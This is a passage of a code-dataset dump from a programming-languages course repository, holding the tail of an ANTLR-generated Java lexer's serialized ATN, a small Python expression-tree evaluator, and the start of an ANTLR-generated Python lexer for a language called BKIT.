\"\\u00e5\\3\\2\\2\\2\\23\\u00eb\\3\\2\\2\\2\\25\\u00ed\\3\\2\\2\\2\\27\\u00ef\\3\\2\\2\\2\\31\\u00f3\"+\n\t\t\"\\3\\2\\2\\2\\33\\u00f6\\3\\2\\2\\2\\35\\u00f8\\3\\2\\2\\2\\37\\u00ff\\3\\2\\2\\2!\\u0107\\3\\2\"+\n\t\t\"\\2\\2#\\u0112\\3\\2\\2\\2%\\u0115\\3\\2\\2\\2\\'\\u0118\\3\\2\\2\\2)\\u011e\\3\\2\\2\\2+\\u0120\"+\n\t\t\"\\3\\2\\2\\2-\\u0122\\3\\2\\2\\2/\\u0128\\3\\2\\2\\2\\61\\u0130\\3\\2\\2\\2\\63\\u0138\\3\\2\\2\"+\n\t\t\"\\2\\65\\u013f\\3\\2\\2\\2\\67\\u0144\\3\\2\\2\\29\\u0146\\3\\2\\2\\2;\\u014a\\3\\2\\2\\2=\\u014c\"+\n\t\t\"\\3\\2\\2\\2?\\u0156\\3\\2\\2\\2A\\u015b\\3\\2\\2\\2C\\u0161\\3\\2\\2\\2E\\u016a\\3\\2\\2\\2G\"+\n\t\t\"\\u016d\\3\\2\\2\\2I\\u0172\\3\\2\\2\\2K\\u0179\\3\\2\\2\\2M\\u0180\\3\\2\\2\\2O\\u0186\\3\\2\"+\n\t\t\"\\2\\2Q\\u018d\\3\\2\\2\\2S\\u0196\\3\\2\\2\\2U\\u019a\\3\\2\\2\\2W\\u01a3\\3\\2\\2\\2Y\\u01a6\"+\n\t\t\"\\3\\2\\2\\2[\\u01b0\\3\\2\\2\\2]\\u01b7\\3\\2\\2\\2_\\u01bc\\3\\2\\2\\2a\\u01c0\\3\\2\\2\\2c\"+\n\t\t\"\\u01c6\\3\\2\\2\\2e\\u01cb\\3\\2\\2\\2g\\u01d1\\3\\2\\2\\2i\\u01d7\\3\\2\\2\\2k\\u01d9\\3\\2\"+\n\t\t\"\\2\\2m\\u01dc\\3\\2\\2\\2o\\u01de\\3\\2\\2\\2q\\u01e1\\3\\2\\2\\2s\\u01e3\\3\\2\\2\\2u\\u01e6\"+\n\t\t\"\\3\\2\\2\\2w\\u01e8\\3\\2\\2\\2y\\u01eb\\3\\2\\2\\2{\\u01ed\\3\\2\\2\\2}\\u01ef\\3\\2\\2\\2\\177\"+\n\t\t\"\\u01f2\\3\\2\\2\\2\\u0081\\u01f5\\3\\2\\2\\2\\u0083\\u01f8\\3\\2\\2\\2\\u0085\\u01fb\\3\\2\"+\n\t\t\"\\2\\2\\u0087\\u01fd\\3\\2\\2\\2\\u0089\\u01ff\\3\\2\\2\\2\\u008b\\u0202\\3\\2\\2\\2\\u008d\"+\n\t\t\"\\u0205\\3\\2\\2\\2\\u008f\\u0209\\3\\2\\2\\2\\u0091\\u020c\\3\\2\\2\\2\\u0093\\u020f\\3\\2\"+\n\t\t\"\\2\\2\\u0095\\u0213\\3\\2\\2\\2\\u0097\\u0217\\3\\2\\2\\2\\u0099\\u0219\\3\\2\\2\\2\\u009b\"+\n\t\t\"\\u021b\\3\\2\\2\\2\\u009d\\u021d\\3\\2\\2\\2\\u009f\\u021f\\3\\2\\2\\2\\u00a1\\u0221\\3\\2\"+\n\t\t\"\\2\\2\\u00a3\\u0223\\3\\2\\2\\2\\u00a5\\u0225\\3\\2\\2\\2\\u00a7\\u0227\\3\\2\\2\\2\\u00a9\"+\n\t\t\"\\u0229\\3\\2\\2\\2\\u00ab\\u00ac\\5\\33\\16\\2\\u00ac\\u00ad\\5!\\21\\2\\u00ad\\4\\3\\2\\2\"+\n\t\t\"\\2\\u00ae\\u00b3\\5\\23\\n\\2\\u00af\\u00b2\\5\\23\\n\\2\\u00b0\\u00b2\\5\\27\\f\\2\\u00b1\"+\n\t\t\"\\u00af\\3\\2\\2\\2\\u00b1\\u00b0\\3\\2\\2\\2\\u00b2\\u00b5\\3\\2\\2\\2\\u00b3\\u00b1\\3\\2\"+\n\t\t\"\\2\\2\\u00b3\\u00b4\\3\\2\\2\\2\\u00b4\\6\\3\\2\\2\\2\\u00b5\\u00b3\\3\\2\\2\\2\\u00b6\\u00ba\"+\n\t\t\"\\7$\\2\\2\\u00b7\\u00b9\\5)\\25\\2\\u00b8\\u00b7\\3\\2\\2\\2\\u00b9\\u00bc\\3\\2\\2\\2\\u00ba\"+\n\t\t\"\\u00b8\\3\\2\\2\\2\\u00ba\\u00bb\\3\\2\\2\\2\\u00bb\\u00bd\\3\\2\\2\\2\\u00bc\\u00ba\\3\\2\"+\n\t\t\"\\2\\2\\u00bd\\u00be\\5#\\22\\2\\u00be\\b\\3\\2\\2\\2\\u00bf\\u00c3\\7$\\2\\2\\u00c0\\u00c2\"+\n\t\t\"\\5)\\25\\2\\u00c1\\u00c0\\3\\2\\2\\2\\u00c2\\u00c5\\3\\2\\2\\2\\u00c3\\u00c1\\3\\2\\2\\2\\u00c3\"+\n\t\t\"\\u00c4\\3\\2\\2\\2\\u00c4\\u00c7\\3\\2\\2\\2\\u00c5\\u00c3\\3\\2\\2\\2\\u00c6\\u00c8\\t\\2\"+\n\t\t\"\\2\\2\\u00c7\\u00c6\\3\\2\\2\\2\\u00c8\\n\\3\\2\\2\\2\\u00c9\\u00ca\\7,\\2\\2\\u00ca\\u00cb\"+\n\t\t\"\\7,\\2\\2\\u00cb\\u00cf\\3\\2\\2\\2\\u00cc\\u00ce\\13\\2\\2\\2\\u00cd\\u00cc\\3\\2\\2\\2\\u00ce\"+\n\t\t\"\\u00d1\\3\\2\\2\\2\\u00cf\\u00d0\\3\\2\\2\\2\\u00cf\\u00cd\\3\\2\\2\\2\\u00d0\\u00d2\\3\\2\"+\n\t\t\"\\2\\2\\u00d1\\u00cf\\3\\2\\2\\2\\u00d2\\u00d3\\7,\\2\\2\\u00d3\\u00d4\\7,\\2\\2\\u00d4\\u00d5\"+\n\t\t\"\\3\\2\\2\\2\\u00d5\\u00d6\\b\\6\\2\\2\\u00d6\\f\\3\\2\\2\\2\\u00d7\\u00d8\\7,\\2\\2\\u00d8\"+\n\t\t\"\\u00d9\\7,\\2\\2\\u00d9\\u00dd\\3\\2\\2\\2\\u00da\\u00dc\\13\\2\\2\\2\\u00db\\u00da\\3\\2\"+\n\t\t\"\\2\\2\\u00dc\\u00df\\3\\2\\2\\2\\u00dd\\u00de\\3\\2\\2\\2\\u00dd\\u00db\\3\\2\\2\\2\\u00de\"+\n\t\t\"\\u00e0\\3\\2\\2\\2\\u00df\\u00dd\\3\\2\\2\\2\\u00e0\\u00e1\\7\\2\\2\\3\\u00e1\\16\\3\\2\\2\"+\n\t\t\"\\2\\u00e2\\u00e3\\t\\3\\2\\2\\u00e3\\20\\3\\2\\2\\2\\u00e4\\u00e6\\t\\4\\2\\2\\u00e5\\u00e4\"+\n\t\t\"\\3\\2\\2\\2\\u00e6\\u00e7\\3\\2\\2\\2\\u00e7\\u00e5\\3\\2\\2\\2\\u00e7\\u00e8\\3\\2\\2\\2\\u00e8\"+\n\t\t\"\\u00e9\\3\\2\\2\\2\\u00e9\\u00ea\\b\\t\\2\\2\\u00ea\\22\\3\\2\\2\\2\\u00eb\\u00ec\\t\\5\\2\"+\n\t\t\"\\2\\u00ec\\24\\3\\2\\2\\2\\u00ed\\u00ee\\t\\6\\2\\2\\u00ee\\26\\3\\2\\2\\2\\u00ef\\u00f0\\t\"+\n\t\t\"\\7\\2\\2\\u00f0\\30\\3\\2\\2\\2\\u00f1\\u00f4\\5\\23\\n\\2\\u00f2\\u00f4\\5\\25\\13\\2\\u00f3\"+\n\t\t\"\\u00f1\\3\\2\\2\\2\\u00f3\\u00f2\\3\\2\\2\\2\\u00f4\\32\\3\\2\\2\\2\\u00f5\\u00f7\\t\\b\\2\"+\n\t\t\"\\2\\u00f6\\u00f5\\3\\2\\2\\2\\u00f6\\u00f7\\3\\2\\2\\2\\u00f7\\34\\3\\2\\2\\2\\u00f8\\u00f9\"+\n\t\t\"\\t\\t\\2\\2\\u00f9\\u00fb\\5\\33\\16\\2\\u00fa\\u00fc\\5\\27\\f\\2\\u00fb\\u00fa\\3\\2\\2\"+\n\t\t\"\\2\\u00fc\\u00fd\\3\\2\\2\\2\\u00fd\\u00fb\\3\\2\\2\\2\\u00fd\\u00fe\\3\\2\\2\\2\\u00fe\\36\"+\n\t\t\"\\3\\2\\2\\2\\u00ff\\u0103\\t\\n\\2\\2\\u0100\\u0102\\5\\27\\f\\2\\u0101\\u0100\\3\\2\\2\\2\"+\n\t\t\"\\u0102\\u0105\\3\\2\\2\\2\\u0103\\u0101\\3\\2\\2\\2\\u0103\\u0104\\3\\2\\2\\2\\u0104 \\3\"+\n\t\t\"\\2\\2\\2\\u0105\\u0103\\3\\2\\2\\2\\u0106\\u0108\\5\\27\\f\\2\\u0107\\u0106\\3\\2\\2\\2\\u0108\"+\n\t\t\"\\u0109\\3\\2\\2\\2\\u0109\\u0107\\3\\2\\2\\2\\u0109\\u010a\\3\\2\\2\\2\\u010a\\u0110\\3\\2\"+\n\t\t\"\\2\\2\\u010b\\u010d\\5\\37\\20\\2\\u010c\\u010e\\5\\35\\17\\2\\u010d\\u010c\\3\\2\\2\\2\\u010d\"+\n\t\t\"\\u010e\\3\\2\\2\\2\\u010e\\u0111\\3\\2\\2\\2\\u010f\\u0111\\5\\35\\17\\2\\u0110\\u010b\\3\"+\n\t\t\"\\2\\2\\2\\u0110\\u010f\\3\\2\\2\\2\\u0111\\\"\\3\\2\\2\\2\\u0112\\u0113\\7^\\2\\2\\u0113\\u0114\"+\n\t\t\"\\n\\13\\2\\2\\u0114$\\3\\2\\2\\2\\u0115\\u0116\\7^\\2\\2\\u0116\\u0117\\t\\13\\2\\2\\u0117\"+\n\t\t\"&\\3\\2\\2\\2\\u0118\\u0119\\7)\\2\\2\\u0119\\u011a\\7$\\2\\2\\u011a(\\3\\2\\2\\2\\u011b\\u011f\"+\n\t\t\"\\n\\f\\2\\2\\u011c\\u011f\\5%\\23\\2\\u011d\\u011f\\5\\'\\24\\2\\u011e\\u011b\\3\\2\\2\\2\"+\n\t\t\"\\u011e\\u011c\\3\\2\\2\\2\\u011e\\u011d\\3\\2\\2\\2\\u011f*\\3\\2\\2\\2\\u0120\\u0121\\t\"+\n\t\t\"\\r\\2\\2\\u0121,\\3\\2\\2\\2\\u0122\\u0123\\t\\16\\2\\2\\u0123.\\3\\2\\2\\2\\u0124\\u0125\"+\n\t\t\"\\7\\62\\2\\2\\u0125\\u0129\\7z\\2\\2\\u0126\\u0127\\7\\62\\2\\2\\u0127\\u0129\\7Z\\2\\2\\u0128\"+\n\t\t\"\\u0124\\3\\2\\2\\2\\u0128\\u0126\\3\\2\\2\\2\\u0129\\u012b\\3\\2\\2\\2\\u012a\\u012c\\5+\"+\n\t\t\"\\26\\2\\u012b\\u012a\\3\\2\\2\\2\\u012c\\u012d\\3\\2\\2\\2\\u012d\\u012b\\3\\2\\2\\2\\u012d\"+\n\t\t\"\\u012e\\3\\2\\2\\2\\u012e\\60\\3\\2\\2\\2\\u012f\\u0131\\5\\27\\f\\2\\u0130\\u012f\\3\\2\\2\"+\n\t\t\"\\2\\u0131\\u0132\\3\\2\\2\\2\\u0132\\u0130\\3\\2\\2\\2\\u0132\\u0133\\3\\2\\2\\2\\u0133\\62\"+\n\t\t\"\\3\\2\\2\\2\\u0134\\u0135\\7\\62\\2\\2\\u0135\\u0139\\7q\\2\\2\\u0136\\u0137\\7\\62\\2\\2\"+\n\t\t\"\\u0137\\u0139\\7Q\\2\\2\\u0138\\u0134\\3\\2\\2\\2\\u0138\\u0136\\3\\2\\2\\2\\u0139\\u013b\"+\n\t\t\"\\3\\2\\2\\2\\u013a\\u013c\\5-\\27\\2\\u013b\\u013a\\3\\2\\2\\2\\u013c\\u013d\\3\\2\\2\\2\\u013d\"+\n\t\t\"\\u013b\\3\\2\\2\\2\\u013d\\u013e\\3\\2\\2\\2\\u013e\\64\\3\\2\\2\\2\\u013f\\u0140\\7$\\2\\2\"+\n\t\t\"\\u0140\\66\\3\\2\\2\\2\\u0141\\u0145\\5\\61\\31\\2\\u0142\\u0145\\5/\\30\\2\\u0143\\u0145\"+\n\t\t\"\\5\\63\\32\\2\\u0144\\u0141\\3\\2\\2\\2\\u0144\\u0142\\3\\2\\2\\2\\u0144\\u0143\\3\\2\\2\\2\"+\n\t\t\"\\u01458\\3\\2\\2\\2\\u0146\\u0147\\5!\\21\\2\\u0147:\\3\\2\\2\\2\\u0148\\u014b\\5c\\62\\2\"+\n\t\t\"\\u0149\\u014b\\5e\\63\\2\\u014a\\u0148\\3\\2\\2\\2\\u014a\\u0149\\3\\2\\2\\2\\u014b<\\3\"+\n\t\t\"\\2\\2\\2\\u014c\\u0150\\7$\\2\\2\\u014d\\u014f\\5)\\25\\2\\u014e\\u014d\\3\\2\\2\\2\\u014f\"+\n\t\t\"\\u0152\\3\\2\\2\\2\\u0150\\u014e\\3\\2\\2\\2\\u0150\\u0151\\3\\2\\2\\2\\u0151\\u0153\\3\\2\"+\n\t\t\"\\2\\2\\u0152\\u0150\\3\\2\\2\\2\\u0153\\u0154\\7$\\2\\2\\u0154\\u0155\\b\\37\\3\\2\\u0155\"+\n\t\t\">\\3\\2\\2\\2\\u0156\\u0157\\7D\\2\\2\\u0157\\u0158\\7q\\2\\2\\u0158\\u0159\\7f\\2\\2\\u0159\"+\n\t\t\"\\u015a\\7{\\2\\2\\u015a@\\3\\2\\2\\2\\u015b\\u015c\\7D\\2\\2\\u015c\\u015d\\7t\\2\\2\\u015d\"+\n\t\t\"\\u015e\\7g\\2\\2\\u015e\\u015f\\7c\\2\\2\\u015f\\u0160\\7m\\2\\2\\u0160B\\3\\2\\2\\2\\u0161\"+\n\t\t\"\\u0162\\7E\\2\\2\\u0162\\u0163\\7q\\2\\2\\u0163\\u0164\\7p\\2\\2\\u0164\\u0165\\7v\\2\\2\"+\n\t\t\"\\u0165\\u0166\\7k\\2\\2\\u0166\\u0167\\7p\\2\\2\\u0167\\u0168\\7w\\2\\2\\u0168\\u0169\"+\n\t\t\"\\7g\\2\\2\\u0169D\\3\\2\\2\\2\\u016a\\u016b\\7F\\2\\2\\u016b\\u016c\\7q\\2\\2\\u016cF\\3\"+\n\t\t\"\\2\\2\\2\\u016d\\u016e\\7G\\2\\2\\u016e\\u016f\\7n\\2\\2\\u016f\\u0170\\7u\\2\\2\\u0170\"+\n\t\t\"\\u0171\\7g\\2\\2\\u0171H\\3\\2\\2\\2\\u0172\\u0173\\7G\\2\\2\\u0173\\u0174\\7n\\2\\2\\u0174\"+\n\t\t\"\\u0175\\7U\\2\\2\\u0175\\u0176\\7g\\2\\2\\u0176\\u0177\\7n\\2\\2\\u0177\\u0178\\7h\\2\\2\"+\n\t\t\"\\u0178J\\3\\2\\2\\2\\u0179\\u017a\\7G\\2\\2\\u017a\\u017b\\7n\\2\\2\\u017b\\u017c\\7u\\2\"+\n\t\t\"\\2\\u017c\\u017d\\7g\\2\\2\\u017d\\u017e\\7K\\2\\2\\u017e\\u017f\\7h\\2\\2\\u017fL\\3\\2\"+\n\t\t\"\\2\\2\\u0180\\u0181\\7G\\2\\2\\u0181\\u0182\\7p\\2\\2\\u0182\\u0183\\7f\\2\\2\\u0183\\u0184\"+\n\t\t\"\\7K\\2\\2\\u0184\\u0185\\7h\\2\\2\\u0185N\\3\\2\\2\\2\\u0186\\u0187\\7G\\2\\2\\u0187\\u0188\"+\n\t\t\"\\7p\\2\\2\\u0188\\u0189\\7f\\2\\2\\u0189\\u018a\\7H\\2\\2\\u018a\\u018b\\7q\\2\\2\\u018b\"+\n\t\t\"\\u018c\\7t\\2\\2\\u018cP\\3\\2\\2\\2\\u018d\\u018e\\7G\\2\\2\\u018e\\u018f\\7p\\2\\2\\u018f\"+\n\t\t\"\\u0190\\7f\\2\\2\\u0190\\u0191\\7Y\\2\\2\\u0191\\u0192\\7j\\2\\2\\u0192\\u0193\\7k\\2\\2\"+\n\t\t\"\\u0193\\u0194\\7n\\2\\2\\u0194\\u0195\\7g\\2\\2\\u0195R\\3\\2\\2\\2\\u0196\\u0197\\7H\\2\"+\n\t\t\"\\2\\u0197\\u0198\\7q\\2\\2\\u0198\\u0199\\7t\\2\\2\\u0199T\\3\\2\\2\\2\\u019a\\u019b\\7\"+\n\t\t\"H\\2\\2\\u019b\\u019c\\7w\\2\\2\\u019c\\u019d\\7p\\2\\2\\u019d\\u019e\\7e\\2\\2\\u019e\\u019f\"+\n\t\t\"\\7v\\2\\2\\u019f\\u01a0\\7k\\2\\2\\u01a0\\u01a1\\7q\\2\\2\\u01a1\\u01a2\\7p\\2\\2\\u01a2\"+\n\t\t\"V\\3\\2\\2\\2\\u01a3\\u01a4\\7K\\2\\2\\u01a4\\u01a5\\7h\\2\\2\\u01a5X\\3\\2\\2\\2\\u01a6\\u01a7\"+\n\t\t\"\\7R\\2\\2\\u01a7\\u01a8\\7c\\2\\2\\u01a8\\u01a9\\7t\\2\\2\\u01a9\\u01aa\\7c\\2\\2\\u01aa\"+\n\t\t\"\\u01ab\\7o\\2\\2\\u01ab\\u01ac\\7g\\2\\2\\u01ac\\u01ad\\7v\\2\\2\\u01ad\\u01ae\\7g\\2\\2\"+\n\t\t\"\\u01ae\\u01af\\7t\\2\\2\\u01afZ\\3\\2\\2\\2\\u01b0\\u01b1\\7T\\2\\2\\u01b1\\u01b2\\7g\\2\"+\n\t\t\"\\2\\u01b2\\u01b3\\7v\\2\\2\\u01b3\\u01b4\\7w\\2\\2\\u01b4\\u01b5\\7t\\2\\2\\u01b5\\u01b6\"+\n\t\t\"\\7p\\2\\2\\u01b6\\\\\\3\\2\\2\\2\\u01b7\\u01b8\\7V\\2\\2\\u01b8\\u01b9\\7j\\2\\2\\u01b9\\u01ba\"+\n\t\t\"\\7g\\2\\2\\u01ba\\u01bb\\7p\\2\\2\\u01bb^\\3\\2\\2\\2\\u01bc\\u01bd\\7X\\2\\2\\u01bd\\u01be\"+\n\t\t\"\\7c\\2\\2\\u01be\\u01bf\\7t\\2\\2\\u01bf`\\3\\2\\2\\2\\u01c0\\u01c1\\7Y\\2\\2\\u01c1\\u01c2\"+\n\t\t\"\\7j\\2\\2\\u01c2\\u01c3\\7k\\2\\2\\u01c3\\u01c4\\7n\\2\\2\\u01c4\\u01c5\\7g\\2\\2\\u01c5\"+\n\t\t\"b\\3\\2\\2\\2\\u01c6\\u01c7\\7V\\2\\2\\u01c7\\u01c8\\7t\\2\\2\\u01c8\\u01c9\\7w\\2\\2\\u01c9\"+\n\t\t\"\\u01ca\\7g\\2\\2\\u01cad\\3\\2\\2\\2\\u01cb\\u01cc\\7H\\2\\2\\u01cc\\u01cd\\7c\\2\\2\\u01cd\"+\n\t\t\"\\u01ce\\7n\\2\\2\\u01ce\\u01cf\\7u\\2\\2\\u01cf\\u01d0\\7g\\2\\2\\u01d0f\\3\\2\\2\\2\\u01d1\"+\n\t\t\"\\u01d2\\7G\\2\\2\\u01d2\\u01d3\\7p\\2\\2\\u01d3\\u01d4\\7f\\2\\2\\u01d4\\u01d5\\7F\\2\\2\"+\n\t\t\"\\u01d5\\u01d6\\7q\\2\\2\\u01d6h\\3\\2\\2\\2\\u01d7\\u01d8\\7-\\2\\2\\u01d8j\\3\\2\\2\\2\\u01d9\"+\n\t\t\"\\u01da\\7-\\2\\2\\u01da\\u01db\\7\\60\\2\\2\\u01dbl\\3\\2\\2\\2\\u01dc\\u01dd\\7/\\2\\2\\u01dd\"+\n\t\t\"n\\3\\2\\2\\2\\u01de\\u01df\\7/\\2\\2\\u01df\\u01e0\\7\\60\\2\\2\\u01e0p\\3\\2\\2\\2\\u01e1\"+\n\t\t\"\\u01e2\\7,\\2\\2\\u01e2r\\3\\2\\2\\2\\u01e3\\u01e4\\7,\\2\\2\\u01e4\\u01e5\\7\\60\\2\\2\\u01e5\"+\n\t\t\"t\\3\\2\\2\\2\\u01e6\\u01e7\\7^\\2\\2\\u01e7v\\3\\2\\2\\2\\u01e8\\u01e9\\7^\\2\\2\\u01e9\\u01ea\"+\n\t\t\"\\7\\60\\2\\2\\u01eax\\3\\2\\2\\2\\u01eb\\u01ec\\7\\'\\2\\2\\u01ecz\\3\\2\\2\\2\\u01ed\\u01ee\"+\n\t\t\"\\7#\\2\\2\\u01ee|\\3\\2\\2\\2\\u01ef\\u01f0\\7(\\2\\2\\u01f0\\u01f1\\7(\\2\\2\\u01f1~\\3\"+\n\t\t\"\\2\\2\\2\\u01f2\\u01f3\\7~\\2\\2\\u01f3\\u01f4\\7~\\2\\2\\u01f4\\u0080\\3\\2\\2\\2\\u01f5\"+\n\t\t\"\\u01f6\\7?\\2\\2\\u01f6\\u01f7\\7?\\2\\2\\u01f7\\u0082\\3\\2\\2\\2\\u01f8\\u01f9\\7#\\2\"+\n\t\t\"\\2\\u01f9\\u01fa\\7?\\2\\2\\u01fa\\u0084\\3\\2\\2\\2\\u01fb\\u01fc\\7>\\2\\2\\u01fc\\u0086\"+\n\t\t\"\\3\\2\\2\\2\\u01fd\\u01fe\\7@\\2\\2\\u01fe\\u0088\\3\\2\\2\\2\\u01ff\\u0200\\7>\\2\\2\\u0200\"+\n\t\t\"\\u0201\\7?\\2\\2\\u0201\\u008a\\3\\2\\2\\2\\u0202\\u0203\\7@\\2\\2\\u0203\\u0204\\7?\\2\"+\n\t\t\"\\2\\u0204\\u008c\\3\\2\\2\\2\\u0205\\u0206\\7?\\2\\2\\u0206\\u0207\\7^\\2\\2\\u0207\\u0208\"+\n\t\t\"\\7?\\2\\2\\u0208\\u008e\\3\\2\\2\\2\\u0209\\u020a\\7>\\2\\2\\u020a\\u020b\\7\\60\\2\\2\\u020b\"+\n\t\t\"\\u0090\\3\\2\\2\\2\\u020c\\u020d\\7@\\2\\2\\u020d\\u020e\\7\\60\\2\\2\\u020e\\u0092\\3\\2\"+\n\t\t\"\\2\\2\\u020f\\u0210\\7>\\2\\2\\u0210\\u0211\\7?\\2\\2\\u0211\\u0212\\7\\60\\2\\2\\u0212\"+\n\t\t\"\\u0094\\3\\2\\2\\2\\u0213\\u0214\\7@\\2\\2\\u0214\\u0215\\7?\\2\\2\\u0215\\u0216\\7\\60\"+\n\t\t\"\\2\\2\\u0216\\u0096\\3\\2\\2\\2\\u0217\\u0218\\7*\\2\\2\\u0218\\u0098\\3\\2\\2\\2\\u0219\"+\n\t\t\"\\u021a\\7+\\2\\2\\u021a\\u009a\\3\\2\\2\\2\\u021b\\u021c\\7]\\2\\2\\u021c\\u009c\\3\\2\\2\"+\n\t\t\"\\2\\u021d\\u021e\\7_\\2\\2\\u021e\\u009e\\3\\2\\2\\2\\u021f\\u0220\\7}\\2\\2\\u0220\\u00a0\"+\n\t\t\"\\3\\2\\2\\2\\u0221\\u0222\\7\\177\\2\\2\\u0222\\u00a2\\3\\2\\2\\2\\u0223\\u0224\\7<\\2\\2\"+\n\t\t\"\\u0224\\u00a4\\3\\2\\2\\2\\u0225\\u0226\\7\\60\\2\\2\\u0226\\u00a6\\3\\2\\2\\2\\u0227\\u0228\"+\n\t\t\"\\7=\\2\\2\\u0228\\u00a8\\3\\2\\2\\2\\u0229\\u022a\\7.\\2\\2\\u022a\\u00aa\\3\\2\\2\\2\\33\"+\n\t\t\"\\2\\u00b1\\u00b3\\u00ba\\u00c3\\u00c7\\u00cf\\u00dd\\u00e7\\u00f3\\u00f6\\u00fd\\u0103\"+\n\t\t\"\\u0109\\u010d\\u0110\\u011e\\u0128\\u012d\\u0132\\u0138\\u013d\\u0144\\u014a\\u0150\"+\n\t\t\"\\4\\b\\2\\2\\3\\37\\2\";\n\tpublic static final ATN _ATN =\n\t\tnew ATNDeserializer().deserialize(_serializedATN.toCharArray());\n\tstatic {\n\t\t_decisionToDFA = new DFA[_ATN.getNumberOfDecisions()];\n\t\tfor (int i = 0; i < _ATN.getNumberOfDecisions(); i++) {\n\t\t\t_decisionToDFA[i] = new DFA(_ATN.getDecisionState(i), i);\n\t\t}\n\t}\n}" }, { "alpha_fraction": 0.5114971995353699, "alphanum_fraction": 0.5145630836486816, "avg_line_length": 22.309524536132812, "blob_id": "e043ecacae334854744c79bc387e04f13989abef", "content_id": "b45648011afd0e88b296c38c0c48a92cf78afa23", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1957, "license_type": "no_license", "max_line_length": 49, "num_lines": 84, "path": "/OOP/Question3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "class Expr:\n pass\n\nclass Var(Expr):\n def __init__(self, _name):\n self.name = _name\n \n def get_val(self):\n return Number(float(1))\n\nclass Number(Expr):\n def __init__(self, _number):\n self.number = _number\n\n def print(self):\n print(str(self.number))\n\n def get_val(self):\n return self\n\n def __add__(self, op):\n return Number(self.number + op.number)\n\n def __sub__(self, op):\n return Number(self.number - op.number)\n \n def __mul__(self, op):\n return Number(self.number * op.number)\n \n def __div__(self, op):\n return Number(self.number / op.number)\n\nclass UnOp(Expr):\n def __init__(self, _op, _arg):\n self.operator = _op\n self.arg = _arg\n \n def eval(self):\n\n if isinstance(self.arg, (Var, Number)):\n self.arg = self.arg.get_val()\n else: self.arg = self.arg.eval()\n\n if self.operator == \"+\":\n return self.arg\n \n if self.operator == \"-\":\n return Number(0)-self.arg\n \n\nclass BinOp(Expr):\n def __init__(self, _op, _left, _right):\n self.operator = _op\n self.left = _left\n self.right = _right\n\n def eval(self):\n if isinstance(self.left, (Var, Number)):\n self.left = self.left.get_val()\n else: self.left = self.left.eval()\n\n if isinstance(self.right, (Var, Number)):\n self.right = self.right.get_val()\n else: self.right = self.right.eval()\n\n if self.operator == \"+\":\n return self.left + self.right\n \n if self.operator == \"-\":\n return self.left - self.right\n\n if self.operator == \"*\":\n return self.left * self.right\n\n if self.operator == \"/\":\n return self.left / self.right\n\n\nx = Var(\"x\")\nv = BinOp(\"+\", x, Number(0.2))\nt = BinOp(\"*\", v, Number(3))\nk = UnOp('-', UnOp('+', Number(1)))\nt.eval().print()\nk.eval().print()" }, { "alpha_fraction": 0.2950237989425659, "alphanum_fraction": 0.565905749797821, "avg_line_length": 59.9619255065918, "blob_id": "3d0d22afead67ef404d8bb56428dff2411f0fe7d", "content_id": "7daa2d997fb59549628028cc961366f5e975b0af", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 30445, "license_type": "no_license", "max_line_length": 112, "num_lines": 499, "path": "/Assignments/assignment1/src/forJava/.antlr/BKITLexer.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# Generated from /home/nguyendat/Documents/projects/PPL/Assignments/assignment1/src/forJava/BKIT.g4 by ANTLR 4.8\nfrom antlr4 import *\nfrom io import StringIO\nfrom typing.io import TextIO\nimport sys\n\n\n\ndef serializedATN():\n with StringIO() as buf:\n buf.write(\"\\3\\u608b\\ua72a\\u8133\\ub9ed\\u417c\\u3be7\\u7786\\u5964\\2M\")\n buf.write(\"\\u02be\\b\\1\\4\\2\\t\\2\\4\\3\\t\\3\\4\\4\\t\\4\\4\\5\\t\\5\\4\\6\\t\\6\\4\\7\")\n buf.write(\"\\t\\7\\4\\b\\t\\b\\4\\t\\t\\t\\4\\n\\t\\n\\4\\13\\t\\13\\4\\f\\t\\f\\4\\r\\t\\r\")\n buf.write(\"\\4\\16\\t\\16\\4\\17\\t\\17\\4\\20\\t\\20\\4\\21\\t\\21\\4\\22\\t\\22\\4\\23\")\n buf.write(\"\\t\\23\\4\\24\\t\\24\\4\\25\\t\\25\\4\\26\\t\\26\\4\\27\\t\\27\\4\\30\\t\\30\")\n buf.write(\"\\4\\31\\t\\31\\4\\32\\t\\32\\4\\33\\t\\33\\4\\34\\t\\34\\4\\35\\t\\35\\4\\36\")\n buf.write(\"\\t\\36\\4\\37\\t\\37\\4 \\t \\4!\\t!\\4\\\"\\t\\\"\\4#\\t#\\4$\\t$\\4%\\t%\")\n buf.write(\"\\4&\\t&\\4\\'\\t\\'\\4(\\t(\\4)\\t)\\4*\\t*\\4+\\t+\\4,\\t,\\4-\\t-\\4.\")\n buf.write(\"\\t.\\4/\\t/\\4\\60\\t\\60\\4\\61\\t\\61\\4\\62\\t\\62\\4\\63\\t\\63\\4\\64\")\n buf.write(\"\\t\\64\\4\\65\\t\\65\\4\\66\\t\\66\\4\\67\\t\\67\\48\\t8\\49\\t9\\4:\\t:\")\n buf.write(\"\\4;\\t;\\4<\\t<\\4=\\t=\\4>\\t>\\4?\\t?\\4@\\t@\\4A\\tA\\4B\\tB\\4C\\t\")\n buf.write(\"C\\4D\\tD\\4E\\tE\\4F\\tF\\4G\\tG\\4H\\tH\\4I\\tI\\4J\\tJ\\4K\\tK\\4L\\t\")\n buf.write(\"L\\4M\\tM\\4N\\tN\\4O\\tO\\4P\\tP\\4Q\\tQ\\4R\\tR\\4S\\tS\\4T\\tT\\4U\\t\")\n buf.write(\"U\\4V\\tV\\4W\\tW\\4X\\tX\\4Y\\tY\\4Z\\tZ\\4[\\t[\\4\\\\\\t\\\\\\3\\2\\3\\2\")\n buf.write(\"\\3\\2\\3\\2\\3\\2\\7\\2\\u00bf\\n\\2\\f\\2\\16\\2\\u00c2\\13\\2\\3\\3\\3\\3\")\n buf.write(\"\\3\\4\\3\\4\\3\\5\\3\\5\\3\\6\\3\\6\\5\\6\\u00cc\\n\\6\\3\\7\\3\\7\\3\\7\\5\\7\")\n buf.write(\"\\u00d1\\n\\7\\3\\7\\6\\7\\u00d4\\n\\7\\r\\7\\16\\7\\u00d5\\3\\b\\3\\b\\7\")\n buf.write(\"\\b\\u00da\\n\\b\\f\\b\\16\\b\\u00dd\\13\\b\\3\\t\\6\\t\\u00e0\\n\\t\\r\\t\")\n 